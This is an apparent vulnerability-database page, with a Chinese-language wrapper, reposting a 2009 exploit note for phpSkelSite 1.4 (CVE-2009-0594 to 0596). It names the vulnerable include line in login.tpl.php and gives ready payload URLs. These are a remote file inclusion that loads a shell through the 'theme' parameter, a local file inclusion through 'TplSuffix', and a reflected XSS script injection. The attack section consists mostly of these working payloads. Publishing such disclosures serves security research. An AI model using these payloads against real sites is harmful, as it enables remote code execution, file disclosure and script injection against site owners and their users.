https://cxsecurity.com/issue/WLB-2009020193
phpSkelSite 1.4 (RFI/LFI/XSS) Multiple Remote Vulnerabilities
| 漏洞ID | 1052187 | 漏洞类型 | |
| 发布时间 | 2009-02-18 | 更新时间 | 2009-02-18 |
 CVE编号
|
CVE-2009-0594
CVE-2009-0595 CVE-2009-0596 |
 CNNVD-ID
|
N/A |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-----------------:RFI/LFI/xss:-----------------
-------------------------------------------
script:phpSkelSite
------------------------------------------------------------------
download from:http://apmuthu.tripod.com/files/phpSkelSite_v1.4.zip
------------------------------------------------------------------
........................................................
vul:/skysilver/login.tpl.php line 1
<? include $theme.'/pageheading'.$TplSuffix ; ?>
------------------------------------------------------
Rfi:
http://127.0.0.1/path/skysilver/login.tpl.php?theme=[shell.txt?]
Lfi:
http://127.0.0.1/path/skysilver/login.tpl.php?TplSuffix=[lfi]
***************************************************
xss:
http://127.0.0.1/path/index.php/>"><ScRiPt>alert('ahmadbady')</ScRiPt>
***************************************************
---------------------
Author: ahmadbady
---------------------
检索漏洞
开始时间
结束时间